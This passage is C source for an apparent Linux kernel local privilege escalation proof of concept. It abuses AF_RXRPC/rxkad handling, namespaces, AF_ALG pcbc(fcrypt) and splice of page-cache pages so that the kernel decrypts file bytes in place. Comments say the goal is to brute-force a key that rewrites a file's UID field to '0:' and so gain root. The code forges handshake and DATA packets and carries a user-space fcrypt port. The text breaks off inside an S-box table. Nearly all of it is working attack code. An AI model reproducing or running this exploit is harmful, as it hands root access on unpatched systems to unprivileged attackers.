#define RXRPC_CHANNELMASK               3
#define RXRPC_CIDSHIFT                  2

struct rxrpc_wire_header {
	uint32_t epoch;
	uint32_t cid;
	uint32_t callNumber;
	uint32_t seq;
	uint32_t serial;
	uint8_t  type;
	uint8_t  flags;
	uint8_t  userStatus;
	uint8_t  securityIndex;
	uint16_t cksum;        /* big-endian on wire */
	uint16_t serviceId;
} __attribute__((packed));

struct rxkad_challenge {
	uint32_t version;
	uint32_t nonce;
	uint32_t min_level;
	uint32_t __padding;
} __attribute__((packed));

/* Attacker-chosen 8-byte session key used for the rxkad token.
 * Mutable because the LPE brute-force iterates over keys looking for
 * one that decrypts the file's UID field to a "0:" prefix. */
static uint8_t SESSION_KEY[8] = {
	0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08
};

#define LOG(fmt, ...) fprintf(stderr, "[+] " fmt "\n", ##__VA_ARGS__)
#define WARN(fmt, ...) fprintf(stderr, "[!] " fmt "\n", ##__VA_ARGS__)
#define DBG(fmt, ...) fprintf(stderr, "[.] " fmt "\n", ##__VA_ARGS__)

/* =================================================================== */
/* unshare + map setup                                                  */
/* =================================================================== */

static int write_file(const char *path, const char *fmt, ...)
{
	int fd = open(path, O_WRONLY);
	if (fd < 0) return -1;
	char buf[256]; va_list ap; va_start(ap, fmt);
	int n = vsnprintf(buf, sizeof(buf), fmt, ap); va_end(ap);
	int r = (int)write(fd, buf, n); close(fd);
	return r;
}

static int do_unshare_userns_netns(void)
{
	uid_t real_uid = getuid();
	gid_t real_gid = getgid();
	if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) {
		WARN("unshare(NEWUSER|NEWNET): %s", strerror(errno));
		return -1;
	}
	LOG("unshare(USER|NET) OK, real uid=%u", real_uid);
	write_file("/proc/self/setgroups", "deny");
	if (write_file("/proc/self/uid_map", "%u %u 1", real_uid, real_uid) < 0) {
		WARN("uid_map: %s", strerror(errno)); return -1;
	}
	if (write_file("/proc/self/gid_map", "%u %u 1", real_gid, real_gid) < 0) {
		WARN("gid_map: %s", strerror(errno)); return -1;
	}
	LOG("uid/gid identity-mapped %u/%u; gained CAP_NET_RAW within netns",
			real_uid, real_gid);

	/* ifup lo */
	int s = socket(AF_INET, SOCK_DGRAM, 0);
	if (s >= 0) {
		struct ifreq ifr; memset(&ifr, 0, sizeof(ifr));
		strcpy(ifr.ifr_name, "lo");
		if (ioctl(s, SIOCGIFFLAGS, &ifr) == 0) {
			ifr.ifr_flags |= IFF_UP | IFF_RUNNING;
			if (ioctl(s, SIOCSIFFLAGS, &ifr) < 0)
				WARN("SIOCSIFFLAGS lo: %s", strerror(errno));
			else
				LOG("lo brought UP in new netns");
		}
		close(s);
	}
	return 0;
}

/* =================================================================== */
/* rxrpc key (rxkad v1 token with attacker session key)                 */
/* =================================================================== */

static long key_add(const char *type, const char *desc,
		const void *payload, size_t plen, int ringid)
{
	return syscall(SYS_add_key, type, desc, payload, plen, ringid);
}

static int build_rxrpc_v1_token(uint8_t *out, size_t maxlen)
{
	uint8_t *p = out;
	uint32_t now = (uint32_t)time(NULL);
	uint32_t expires = now + 86400;
	*(uint32_t *)p = htonl(0); p += 4;   /* flags */
	const char *cell = "evil";
	uint32_t clen = strlen(cell);
	*(uint32_t *)p = htonl(clen); p += 4;
	memcpy(p, cell, clen);
	uint32_t pad = (4 - (clen & 3)) & 3;
	memset(p + clen, 0, pad);
	p += clen + pad;
	*(uint32_t *)p = htonl(1); p += 4;   /* ntoken */
	uint8_t *toklen_p = p; p += 4;
	uint8_t *tokstart = p;
	*(uint32_t *)p = htonl(2); p += 4;   /* sec_ix = RXKAD */
	*(uint32_t *)p = htonl(0); p += 4;   /* vice_id */
	*(uint32_t *)p = htonl(1); p += 4;   /* kvno */
	memcpy(p, SESSION_KEY, 8); p += 8;   /* session_key K */
	*(uint32_t *)p = htonl(now); p += 4;
	*(uint32_t *)p = htonl(expires); p += 4;
	*(uint32_t *)p = htonl(1); p += 4;   /* primary_flag */
	*(uint32_t *)p = htonl(8); p += 4;   /* ticket_len */
	memset(p, 0xCC, 8); p += 8;          /* ticket */
	uint32_t toklen = (uint32_t)(p - tokstart);
	*(uint32_t *)toklen_p = htonl(toklen);
	if ((size_t)(p - out) > maxlen) { errno = E2BIG; return -1; }
	return (int)(p - out);
}

static long add_rxrpc_key(const char *desc)
{
	uint8_t buf[512];
	int n = build_rxrpc_v1_token(buf, sizeof(buf));
	if (n < 0) return -1;
	return key_add("rxrpc", desc, buf, n, KEY_SPEC_PROCESS_KEYRING);
}

/* =================================================================== */
/* AF_ALG pcbc(fcrypt) helpers                                          */
/* =================================================================== */

static int alg_open_pcbc_fcrypt(const uint8_t key[8])
{
	int s = socket(AF_ALG, SOCK_SEQPACKET, 0);
	if (s < 0) { WARN("socket(AF_ALG): %s", strerror(errno)); return -1; }
	struct sockaddr_alg sa = { .salg_family = AF_ALG };
	strcpy((char *)sa.salg_type, "skcipher");
	strcpy((char *)sa.salg_name, "pcbc(fcrypt)");
	if (bind(s, (struct sockaddr *)&sa, sizeof(sa)) < 0) {
		WARN("bind(AF_ALG pcbc(fcrypt)): %s", strerror(errno));
		close(s); return -1;
	}
	if (setsockopt(s, SOL_ALG, ALG_SET_KEY, key, 8) < 0) {
		WARN("ALG_SET_KEY: %s", strerror(errno));
		close(s); return -1;
	}
	return s;
}

/* Encrypt-or-decrypt a 1+ block of data with a given IV. */
static int alg_op(int alg_s, int op, const uint8_t iv[8],
		const void *in, size_t inlen, void *out)
{
	int op_fd = accept(alg_s, NULL, NULL);
	if (op_fd < 0) { WARN("accept(AF_ALG): %s", strerror(errno)); return -1; }

	char cbuf[CMSG_SPACE(sizeof(int)) +
		CMSG_SPACE(sizeof(struct af_alg_iv) + 8)] = {0};
	struct msghdr msg = {0};
	msg.msg_control = cbuf;
	msg.msg_controllen = sizeof(cbuf);

	struct cmsghdr *c = CMSG_FIRSTHDR(&msg);
	c->cmsg_level = SOL_ALG;
	c->cmsg_type = ALG_SET_OP;
	c->cmsg_len = CMSG_LEN(sizeof(int));
	*(int *)CMSG_DATA(c) = op;

	c = CMSG_NXTHDR(&msg, c);
	c->cmsg_level = SOL_ALG;
	c->cmsg_type = ALG_SET_IV;
	c->cmsg_len = CMSG_LEN(sizeof(struct af_alg_iv) + 8);
	struct af_alg_iv *aiv = (struct af_alg_iv *)CMSG_DATA(c);
	aiv->ivlen = 8;
	memcpy(aiv->iv, iv, 8);

	struct iovec iov = { .iov_base = (void *)in, .iov_len = inlen };
	msg.msg_iov = &iov; msg.msg_iovlen = 1;

	if (sendmsg(op_fd, &msg, 0) < 0) {
		WARN("AF_ALG sendmsg: %s", strerror(errno));
		close(op_fd); return -1;
	}
	ssize_t n = read(op_fd, out, inlen);
	close(op_fd);
	if (n != (ssize_t)inlen) {
		WARN("AF_ALG read got %zd want %zu: %s",
				n, inlen, strerror(errno));
		return -1;
	}
	return 0;
}

/* Compute conn->rxkad.csum_iv (ref: rxkad_prime_packet_security):
 *   tmpbuf[0..3] = htonl(epoch, cid, 0, security_ix)  (16 B)
 *   PCBC-encrypt(tmpbuf, IV=session_key) → out[16]
 *   csum_iv = out[8..15]   (last 8 B = "tmpbuf[2..3]" after encryption)
 */
static int compute_csum_iv(uint32_t epoch, uint32_t cid, uint32_t sec_ix,
		const uint8_t key[8], uint8_t csum_iv[8])
{
	int s = alg_open_pcbc_fcrypt(key);
	if (s < 0) return -1;
	uint32_t in[4]  = { htonl(epoch), htonl(cid), 0, htonl(sec_ix) };
	uint8_t  out[16];
	int rc = alg_op(s, ALG_OP_ENCRYPT, key, in, 16, out);
	close(s);
	if (rc < 0) return -1;
	memcpy(csum_iv, out + 8, 8);
	return 0;
}

/* Compute the wire cksum (ref: rxkad_secure_packet @rxkad.c:342):
 *   x = (cid_low2 << 30) | (seq & 0x3fffffff)
 *   buf[0] = htonl(call_id), buf[1] = htonl(x)    (8 B)
 *   PCBC-encrypt(buf, IV=csum_iv) → enc[8]
 *   y = ntohl(enc[1]); cksum = (y >> 16) & 0xffff;  if zero -> 1
 */
static int compute_cksum(uint32_t cid, uint32_t call_id, uint32_t seq,
		const uint8_t key[8], const uint8_t csum_iv[8],
		uint16_t *cksum_out)
{
	int s = alg_open_pcbc_fcrypt(key);
	if (s < 0) return -1;
	uint32_t x = (cid & RXRPC_CHANNELMASK) << (32 - RXRPC_CIDSHIFT);
	x |= seq & 0x3fffffff;
	uint32_t in[2] = { htonl(call_id), htonl(x) };
	uint32_t out[2];
	int rc = alg_op(s, ALG_OP_ENCRYPT, csum_iv, in, 8, out);
	close(s);
	if (rc < 0) return -1;
	uint32_t y = ntohl(out[1]);
	uint16_t v = (y >> 16) & 0xffff;
	if (v == 0) v = 1;
	*cksum_out = v;
	return 0;
}

/* =================================================================== */
/* AF_RXRPC client                                                      */
/* =================================================================== */

static int setup_rxrpc_client(uint16_t local_port, const char *keyname)
{
	int fd = socket(AF_RXRPC, SOCK_DGRAM, PF_INET);
	if (fd < 0) { WARN("socket(AF_RXRPC client): %s", strerror(errno)); return -1; }
	if (setsockopt(fd, SOL_RXRPC, RXRPC_SECURITY_KEY,
				keyname, strlen(keyname)) < 0) {
		WARN("client SECURITY_KEY: %s", strerror(errno)); close(fd); return -1;
	}
	int min_level = RXRPC_SECURITY_AUTH;
	if (setsockopt(fd, SOL_RXRPC, RXRPC_MIN_SECURITY_LEVEL,
				&min_level, sizeof(min_level)) < 0) {
		WARN("client MIN_SECURITY_LEVEL: %s", strerror(errno));
		close(fd); return -1;
	}
	struct sockaddr_rxrpc srx = {0};
	srx.srx_family = AF_RXRPC;
	srx.srx_service = 0;
	srx.transport_type = SOCK_DGRAM;
	srx.transport_len = sizeof(struct sockaddr_in);
	srx.transport.sin.sin_family = AF_INET;
	srx.transport.sin.sin_port = htons(local_port);
	srx.transport.sin.sin_addr.s_addr = htonl(0x7F000001);
	if (bind(fd, (struct sockaddr *)&srx, sizeof(srx)) < 0) {
		WARN("client bind :%u: %s", local_port, strerror(errno));
		close(fd); return -1;
	}
	LOG("AF_RXRPC client bound :%u", local_port);
	return fd;
}

static int rxrpc_client_initiate_call(int cli_fd, uint16_t srv_port,
		uint16_t service_id,
		unsigned long user_call_id)
{
	char data[8] = "PINGPING";
	struct sockaddr_rxrpc srx = {0};
	srx.srx_family = AF_RXRPC;
	srx.srx_service = service_id;
	srx.transport_type = SOCK_DGRAM;
	srx.transport_len = sizeof(struct sockaddr_in);
	srx.transport.sin.sin_family = AF_INET;
	srx.transport.sin.sin_port = htons(srv_port);
	srx.transport.sin.sin_addr.s_addr = htonl(0x7F000001);

	char cmsg_buf[CMSG_SPACE(sizeof(unsigned long))];
	struct msghdr msg = {0};
	msg.msg_name = &srx; msg.msg_namelen = sizeof(srx);
	struct iovec iov = { .iov_base = data, .iov_len = sizeof(data) };
	msg.msg_iov = &iov; msg.msg_iovlen = 1;
	msg.msg_control = cmsg_buf; msg.msg_controllen = sizeof(cmsg_buf);
	struct cmsghdr *cmsg = CMSG_FIRSTHDR(&msg);
	cmsg->cmsg_level = SOL_RXRPC;
	cmsg->cmsg_type = RXRPC_USER_CALL_ID;
	cmsg->cmsg_len = CMSG_LEN(sizeof(unsigned long));
	*(unsigned long *)CMSG_DATA(cmsg) = user_call_id;

	/* Don't block forever if no reply ever comes through this single sendmsg. */
	int fl = fcntl(cli_fd, F_GETFL);
	fcntl(cli_fd, F_SETFL, fl | O_NONBLOCK);

	ssize_t n = sendmsg(cli_fd, &msg, 0);
	fcntl(cli_fd, F_SETFL, fl);
	if (n < 0) {
		if (errno == EAGAIN || errno == EWOULDBLOCK) {
			LOG("client sendmsg returned EAGAIN (expected; kernel will keep "
					"retrying handshake)");
			return 0;
		}
		WARN("client sendmsg: %s", strerror(errno));
		return -1;
	}
	LOG("client sendmsg %zd B → :%u (handshake will follow asynchronously)",
			n, srv_port);
	return 0;
}

/* =================================================================== */
/* fake-server (plain UDP)                                              */
/* =================================================================== */

static int setup_udp_server(uint16_t port)
{
	int s = socket(AF_INET, SOCK_DGRAM, 0);
	if (s < 0) { WARN("socket(udp server): %s", strerror(errno)); return -1; }
	struct sockaddr_in sa = {0};
	sa.sin_family = AF_INET;
	sa.sin_port = htons(port);
	sa.sin_addr.s_addr = htonl(0x7F000001);
	if (bind(s, (struct sockaddr *)&sa, sizeof(sa)) < 0) {
		WARN("udp server bind :%u: %s", port, strerror(errno));
		close(s); return -1;
	}
	LOG("plain UDP fake-server bound :%u", port);
	return s;
}

/* Receive one UDP datagram with timeout (ms). Returns the byte count, or -1 on timeout or error. */
static ssize_t udp_recv_to(int s, void *buf, size_t cap,
		struct sockaddr_in *from, int timeout_ms)
{
	struct pollfd pfd = { .fd = s, .events = POLLIN };
	int rc = poll(&pfd, 1, timeout_ms);
	if (rc <= 0) return -1;
	socklen_t fl = from ? sizeof(*from) : 0;
	return recvfrom(s, buf, cap, 0,
			(struct sockaddr *)from, from ? &fl : NULL);
}

/* =================================================================== */
/* main PoC                                                             */
/* =================================================================== */

static int trigger_seq = 0;

static int do_one_trigger(int target_fd, off_t splice_off, size_t splice_len)
{
	char keyname[32];
	snprintf(keyname, sizeof(keyname), "evil%d", trigger_seq++);

	long key = add_rxrpc_key(keyname);
	if (key < 0) {
		if (trigger_seq < 5) WARN("add_rxrpc_key(%s): %s", keyname, strerror(errno));
		return -1;
	}

	/* Use varying ports so stale kernel socket/connection state from an earlier trigger does not bite. */
	uint16_t port_S = 7777 + (trigger_seq * 2 % 200);
	uint16_t port_C = port_S + 1;
	uint16_t svc_id = 1234;

	int udp_srv = setup_udp_server(port_S);
	if (udp_srv < 0) {
		if (trigger_seq < 5) WARN("setup_udp_server(%u) failed", port_S);
		syscall(SYS_keyctl, 3 /*KEYCTL_REVOKE*/, key); return -1;
	}

	int rxsk_cli = setup_rxrpc_client(port_C, keyname);
	if (rxsk_cli < 0) {
		if (trigger_seq < 5) WARN("setup_rxrpc_client(%u, %s) failed", port_C, keyname);
		close(udp_srv); syscall(SYS_keyctl, 3, key); return -1;
	}

	if (rxrpc_client_initiate_call(rxsk_cli, port_S, svc_id, 0xDEAD) < 0) {
		if (trigger_seq < 5) WARN("rxrpc_client_initiate_call failed");
		close(rxsk_cli); close(udp_srv); syscall(SYS_keyctl, 3, key); return -1;
	}

	uint8_t pkt[2048];
	struct sockaddr_in cli_addr;
	ssize_t n = udp_recv_to(udp_srv, pkt, sizeof(pkt), &cli_addr, 1500);
	if (n < (ssize_t)sizeof(struct rxrpc_wire_header)) {
		if (trigger_seq < 5) WARN("udp_recv_to: n=%zd errno=%s", n, strerror(errno));
		close(rxsk_cli); close(udp_srv); syscall(SYS_keyctl, 3, key); return -1;
	}
	struct rxrpc_wire_header *whdr_in = (struct rxrpc_wire_header *)pkt;
	uint32_t epoch  = ntohl(whdr_in->epoch);
	uint32_t cid    = ntohl(whdr_in->cid);
	uint32_t callN  = ntohl(whdr_in->callNumber);
	uint16_t svc_in = ntohs(whdr_in->serviceId);
	uint16_t cli_port = ntohs(cli_addr.sin_port);

	/* Send CHALLENGE */
	{
		struct {
			struct rxrpc_wire_header hdr;
			struct rxkad_challenge   ch;
		} __attribute__((packed)) c = {0};
		c.hdr.epoch = htonl(epoch);
		c.hdr.cid = htonl(cid);
		c.hdr.callNumber = 0; c.hdr.seq = 0;
		c.hdr.serial = htonl(0x10000);
		c.hdr.type = RXRPC_PACKET_TYPE_CHALLENGE;
		c.hdr.securityIndex = 2;
		c.hdr.serviceId = htons(svc_in);
		c.ch.version = htonl(2); c.ch.nonce = htonl(0xDEADBEEFu);
		c.ch.min_level = htonl(1);
		struct sockaddr_in to = { .sin_family=AF_INET, .sin_port=htons(cli_port),
			.sin_addr.s_addr=htonl(0x7F000001) };
		if (sendto(udp_srv, &c, sizeof(c), 0, (struct sockaddr*)&to, sizeof(to)) < 0) {
			close(rxsk_cli); close(udp_srv); syscall(SYS_keyctl, 3, key); return -1;
		}
	}

	/* Drain RESPONSE (best-effort) */
	for (int i = 0; i < 4; i++) {
		struct sockaddr_in src;
		if (udp_recv_to(udp_srv, pkt, sizeof(pkt), &src, 500) < 0) break;
	}

	/* csum_iv + cksum with CURRENT SESSION_KEY */
	uint8_t csum_iv[8] = {0};
	if (compute_csum_iv(epoch, cid, 2, SESSION_KEY, csum_iv) < 0) {
		close(rxsk_cli); close(udp_srv); syscall(SYS_keyctl, 3, key); return -1;
	}
	uint16_t cksum_h = 0;
	if (compute_cksum(cid, callN, 1, SESSION_KEY, csum_iv, &cksum_h) < 0) {
		close(rxsk_cli); close(udp_srv); syscall(SYS_keyctl, 3, key); return -1;
	}

	/* Build malicious DATA header */
	struct rxrpc_wire_header mal = {0};
	mal.epoch = htonl(epoch);
	mal.cid = htonl(cid);
	mal.callNumber = htonl(callN);
	mal.seq = htonl(1);
	mal.serial = htonl(0x42000);
	mal.type = RXRPC_PACKET_TYPE_DATA;
	mal.flags = RXRPC_LAST_PACKET;
	mal.securityIndex = 2;
	mal.cksum = htons(cksum_h);
	mal.serviceId = htons(svc_in);

	/* connect udp_srv → client port for splice */
	struct sockaddr_in dst = { .sin_family=AF_INET, .sin_port=htons(cli_port),
		.sin_addr.s_addr=htonl(0x7F000001) };
	if (connect(udp_srv, (struct sockaddr*)&dst, sizeof(dst)) < 0) {
		close(rxsk_cli); close(udp_srv); syscall(SYS_keyctl, 3, key); return -1;
	}

	/* pipe + vmsplice header + splice file → pipe → udp_srv */
	int p[2];
	if (pipe(p) < 0) {
		close(rxsk_cli); close(udp_srv); syscall(SYS_keyctl, 3, key); return -1;
	}
	{
		struct iovec viv = { .iov_base = &mal, .iov_len = sizeof(mal) };
		if (vmsplice(p[1], &viv, 1, 0) < 0) goto trig_fail;
	}
	{
		loff_t off = splice_off;
		if (splice(target_fd, &off, p[1], NULL, splice_len, SPLICE_F_NONBLOCK) < 0)
			goto trig_fail;
	}
	if (splice(p[0], NULL, udp_srv, NULL, sizeof(mal) + splice_len, 0) < 0) {
		goto trig_fail;
	}
	close(p[0]); close(p[1]);

	/* recvmsg the malicious DATA into the kernel's verify_packet path */
	int fl = fcntl(rxsk_cli, F_GETFL);
	fcntl(rxsk_cli, F_SETFL, fl | O_NONBLOCK);
	for (int round = 0; round < 5; round++) {
		char rb[2048];
		struct sockaddr_rxrpc srx;
		char ccb[256];
		struct msghdr m = {0};
		struct iovec iv = { .iov_base = rb, .iov_len = sizeof(rb) };
		m.msg_name = &srx; m.msg_namelen = sizeof(srx);
		m.msg_iov = &iv;  m.msg_iovlen = 1;
		m.msg_control = ccb; m.msg_controllen = sizeof(ccb);
		ssize_t r = recvmsg(rxsk_cli, &m, 0);
		if (r > 0) break;
		if (errno == EAGAIN || errno == EWOULDBLOCK) usleep(20000);
		else break;
	}
	fcntl(rxsk_cli, F_SETFL, fl);

	close(rxsk_cli);
	close(udp_srv);
	syscall(SYS_keyctl, 3, key);
	return 0;

trig_fail:
	close(p[0]); close(p[1]);
	close(rxsk_cli); close(udp_srv); syscall(SYS_keyctl, 3, key);
	return -1;
}

/* ===================================================================
 * USER-SPACE pcbc(fcrypt) BRUTE-FORCE
 *
 * The kernel's rxkad_verify_packet_1() does an in-place 8-byte
 * pcbc(fcrypt) decrypt with iv=0 over the page-cache page at the splice
 * offset.  pcbc with single 8-B block and IV=0 reduces to a plain
 * fcrypt_decrypt(C, K).  We can therefore search for the right K
 * entirely in user-space — without touching the kernel/VM at all —
 * before applying ONE deterministic kernel trigger.
 *
 * Port of crypto/fcrypt.c from the kernel source (David Howells / KTH).
 * Verified against kernel test vectors:
 *   K=0,         decrypt(0E0900C73EF7ED41) = 0000000000000000
 *   K=1144...66, decrypt(D8ED787477EC0680) = 123456789ABCDEF0
 * =================================================================== */
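
/* Worked reduction for the claim above (a sketch using the textbook PCBC
 * definition, not text taken from the kernel source):
 *
 *   encrypt:  C_i = E_K(P_i ^ P_{i-1} ^ C_{i-1}),  with P_0 ^ C_0 := IV
 *   decrypt:  P_i = D_K(C_i) ^ P_{i-1} ^ C_{i-1}
 *
 * For a single block (i = 1) this gives P_1 = D_K(C_1) ^ IV, and with
 * IV = 0 it collapses to P_1 = D_K(C_1): one raw fcrypt block decrypt,
 * which is what fcrypt_user_decrypt() below computes. */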

static const uint8_t fc_sbox0_raw[256] = {
	0xea, 0x7f, 0xb2, 0x64, 0x9d, 0xb0, 0xd9, 0x11, 0xcd, 0x86, 0x86, 0x91, 0x0a, 0xb2, 0x93, 0x06,
	0x0e, 0x06, 0xd2, 0x65, 0x73, 0xc5, 0x28, 0x60, 0xf2, 0x20, 0xb5, 0x38, 0x7e, 0xda, 0x9f, 0xe3,
	0xd2, 0xcf, 0xc4, 0x3c, 0x61, 0xff, 0x4a, 0x4a, 0x35, 0xac, 0xaa, 0x5f, 0x2b, 0xbb, 0xbc, 0x53,
	0x4e, 0x9d, 0x78, 0xa3, 0xdc, 0x09, 0x32, 0x10, 0xc6, 0x6f, 0x66, 0xd6, 0xab, 0xa9, 0xaf, 0xfd,
	0x3b, 0x95, 0xe8, 0x34, 0x9a, 0x81, 0x72, 0x80, 0x9c, 0xf3, 0xec, 0xda, 0x9f, 0x26, 0x76, 0x15,
	0x3e, 0x55, 0x4d, 0xde, 0x84, 0xee, 0xad, 0xc7, 0xf1, 0x6b, 0x3d, 0xd3, 0x04, 0x49, 0xaa, 0x24,
	0x0b, 0x8a, 0x83, 0xba, 0xfa, 0x85, 0xa0, 0xa8, 0xb1, 0xd4, 0x01, 0xd8, 0x70, 0x64, 0xf0, 0x51,
	0xd2, 0xc3, 0xa7, 0x75, 0x8c, 0xa5, 0x64, 0xef, 0x10, 0x4e, 0xb7, 0xc6, 0x61, 0x03, 0xeb, 0x44,
	0x3d, 0xe5, 0xb3, 0x5b, 0xae, 0xd5, 0xad, 0x1d, 0xfa, 0x5a, 0x1e, 0x33, 0xab, 0x93, 0xa2, 0xb7,
	0xe7, 0xa8, 0x45, 0xa4, 0xcd, 0x29, 0x63, 0x44, 0xb6, 0x69, 0x7e, 0x2e, 0x62, 0x03, 0xc8, 0xe0,
	0x17, 0xbb, 0xc7, 0xf3, 0x3f, 0x36, 0xba, 0x71, 0x8e, 0x97, 0x65, 0x60, 0x69, 0xb6, 0xf6, 0xe6,
	0x6e, 0xe0, 0x81, 0x59, 0xe8, 0xaf, 0xdd, 0x95, 0x22, 0x99, 0xfd, 0x63, 0x19, 0x74, 0x61, 0xb1,
	0xb6, 0x5b, 0xae, 0x54, 0xb3, 0x70, 0xff, 0xc6, 0x3b, 0x3e, 0xc1, 0xd7, 0xe1, 0x0e, 0x76, 0xe5,
	0x36, 0x4f, 0x59, 0xc7, 0x08, 0x6e, 0x82, 0xa6, 0x93, 0xc4, 0xaa, 0x26, 0x49, 0xe0, 0x21, 0x64,
	0x07, 0x9f, 0x64, 0x81, 0x9c, 0xbf, 0xf9, 0xd1, 0x43, 0xf8, 0xb6, 0xb9, 0xf1, 0x24, 0x75, 0x03,
	0xe4, 0xb0, 0x99, 0x46, 0x3d, 0xf5, 0xd1, 0x39, 0x72, 0x12, 0xf6, 0xba, 0x0c, 0x0d, 0x42, 0x2e,
};
static const uint8_t fc_sbox1_raw[256] = {
	0x77, 0x14, 0xa6, 0xfe, 0xb2, 0x5e, 0x8c, 0x3e, 0x67, 0x6c, 0xa1, 0x0d, 0xc2, 0xa2, 0xc1, 0x85,
	0x6c, 0x7b, 0x67, 0xc6, 0x23, 0xe3, 0xf2, 0x89, 0x50, 0x9c, 0x03, 0xb7, 0x73, 0xe6, 0xe1, 0x39,
	0x31, 0x2c, 0x27, 0x9f, 0xa5, 0x69, 0x44, 0xd6, 0x23, 0x83, 0x98, 0x7d, 0x3c, 0xb4, 0x2d, 0x99,
	0x1c, 0x1f, 0x8c, 0x20, 0x03, 0x7c, 0x5f, 0xad, 0xf4, 0xfa, 0x95, 0xca, 0x76, 0x44, 0xcd, 0xb6,
	0xb8, 0xa1, 0xa1, 0xbe, 0x9e, 0x54, 0x8f, 0x0b, 0x16, 0x74, 0x31, 0x8a, 0x23, 0x17, 0x04, 0xfa,
	0x79, 0x84, 0xb1, 0xf5, 0x13, 0xab, 0xb5, 0x2e, 0xaa, 0x0c, 0x60, 0x6b, 0x5b, 0xc4, 0x4b, 0xbc,
	0xe2, 0xaf, 0x45, 0x73, 0xfa, 0xc9, 0x49, 0xcd, 0x00, 0x92, 0x7d, 0x97, 0x7a, 0x18, 0x60, 0x3d,
	0xcf, 0x5b, 0xde, 0xc6, 0xe2, 0xe6, 0xbb, 0x8b, 0x06, 0xda, 0x08, 0x15, 0x1b, 0x88, 0x6a, 0x17,
	0x89, 0xd0, 0xa9, 0xc1, 0xc9, 0x70, 0x6b, 0xe5, 0x43, 0xf4, 0x68, 0xc8, 0xd3, 0x84, 0x28, 0x0a,
	0x52, 0x66, 0xa3, 0xca, 0xf2, 0xe3, 0x7f, 0x7a, 0x31, 0xf7, 0x88, 0x94, 0x5e, 0x9c, 0x63, 0xd5,
	0x24, 0x66, 0xfc, 0xb3, 0x57, 0x25, 0xbe, 0x89, 0x44, 0xc4, 0xe0, 0x8f, 0x23, 0x3c, 0x12, 0x52,
	0xf5, 0x1e, 0xf4, 0xcb, 0x18, 0x33, 0x1f, 0xf8, 0x69, 0x10, 0x9d, 0xd3, 0xf7, 0x28, 0xf8, 0x30,
	0x05, 0x5e, 0x32, 0xc0, 0xd5, 0x19, 0xbd, 0x45, 0x8b, 0x5b, 0xfd, 0xbc, 0xe2, 0x5c, 0xa9, 0x96,
	0xef, 0x70, 0xcf, 0xc2, 0x2a, 0xb3, 0x61, 0xad, 0x80, 0x48, 0x81, 0xb7, 0x1d, 0x43, 0xd9, 0xd7,
	0x45, 0xf0, 0xd8, 0x8a, 0x59, 0x7c, 0x57, 0xc1, 0x79, 0xc7, 0x34, 0xd6, 0x43, 0xdf, 0xe4, 0x78,
	0x16, 0x06, 0xda, 0x92, 0x76, 0x51, 0xe1, 0xd4, 0x70, 0x03, 0xe0, 0x2f, 0x96, 0x91, 0x82, 0x80,
};
static const uint8_t fc_sbox2_raw[256] = {
	0xf0, 0x37, 0x24, 0x53, 0x2a, 0x03, 0x83, 0x86, 0xd1, 0xec, 0x50, 0xf0, 0x42, 0x78, 0x2f, 0x6d,
	0xbf, 0x80, 0x87, 0x27, 0x95, 0xe2, 0xc5, 0x5d, 0xf9, 0x6f, 0xdb, 0xb4, 0x65, 0x6e, 0xe7, 0x24,
	0xc8, 0x1a, 0xbb, 0x49, 0xb5, 0x0a, 0x7d, 0xb9, 0xe8, 0xdc, 0xb7, 0xd9, 0x45, 0x20, 0x1b, 0xce,
	0x59, 0x9d, 0x6b, 0xbd, 0x0e, 0x8f, 0xa3, 0xa9, 0xbc, 0x74, 0xa6, 0xf6, 0x7f, 0x5f, 0xb1, 0x68,
	0x84, 0xbc, 0xa9, 0xfd, 0x55, 0x50, 0xe9, 0xb6, 0x13, 0x5e, 0x07, 0xb8, 0x95, 0x02, 0xc0, 0xd0,
	0x6a, 0x1a, 0x85, 0xbd, 0xb6, 0xfd, 0xfe, 0x17, 0x3f, 0x09, 0xa3, 0x8d, 0xfb, 0xed, 0xda, 0x1d,
	0x6d, 0x1c, 0x6c, 0x01, 0x5a, 0xe5, 0x71, 0x3e, 0x8b, 0x6b, 0xbe, 0x29, 0xeb, 0x12, 0x19, 0x34,
	0xcd, 0xb3, 0xbd, 0x35, 0xea, 0x4b, 0xd5, 0xae, 0x2a, 0x79, 0x5a, 0xa5, 0x32, 0x12, 0x7b, 0xdc,
	0x2c, 0xd0, 0x22, 0x4b, 0xb1, 0x85, 0x59, 0x80, 0xc0, 0x30, 0x9f, 0x73, 0xd3, 0x14, 0x48, 0x40,
	0x07, 0x2d, 0x8f, 0x80, 0x0f, 0xce, 0x0b, 0x5e, 0xb7, 0x5e, 0xac, 0x24, 0x94, 0x4a, 0x18, 0x15,
	0x05, 0xe8, 0x02, 0x77, 0xa9, 0xc7, 0x40, 0x45, 0x89, 0xd1, 0xea, 0xde, 0x0c, 0x79, 0x2a, 0x99,
	0x6c, 0x3e, 0x95, 0xdd, 0x8c, 0x7d, 0xad, 0x6f, 0xdc, 0xff, 0xfd, 0x62, 0x47, 0xb3, 0x21, 0x8a,
	0xec, 0x8e, 0x19, 0x18, 0xb4, 0x6e, 0x3d, 0xfd, 0x74, 0x54, 0x1e, 0x04, 0x85, 0xd8, 0xbc, 0x1f,
	0x56, 0xe7, 0x3a, 0x56, 0x67, 0xd6, 0xc8, 0xa5, 0xf3, 0x8e, 0xde, 0xae, 0x37, 0x49, 0xb7, 0xfa,
	0xc8, 0xf4, 0x1f, 0xe0, 0x2a, 0x9b, 0x15, 0xd1, 0x34, 0x0e, 0xb5, 0xe0, 0x44, 0x78, 0x84, 0x59,
	0x56, 0x68, 0x77, 0xa5, 0x14, 0x06, 0xf5, 0x2f, 0x8c, 0x8a, 0x73, 0x80, 0x76, 0xb4, 0x10, 0x86,
};
static const uint8_t fc_sbox3_raw[256] = {
	0xa9, 0x2a, 0x48, 0x51, 0x84, 0x7e, 0x49, 0xe2, 0xb5, 0xb7, 0x42, 0x33, 0x7d, 0x5d, 0xa6, 0x12,
	0x44, 0x48, 0x6d, 0x28, 0xaa, 0x20, 0x6d, 0x57, 0xd6, 0x6b, 0x5d, 0x72, 0xf0, 0x92, 0x5a, 0x1b,
	0x53, 0x80, 0x24, 0x70, 0x9a, 0xcc, 0xa7, 0x66, 0xa1, 0x01, 0xa5, 0x41, 0x97, 0x41, 0x31, 0x82,
	0xf1, 0x14, 0xcf, 0x53, 0x0d, 0xa0, 0x10, 0xcc, 0x2a, 0x7d, 0xd2, 0xbf, 0x4b, 0x1a, 0xdb, 0x16,
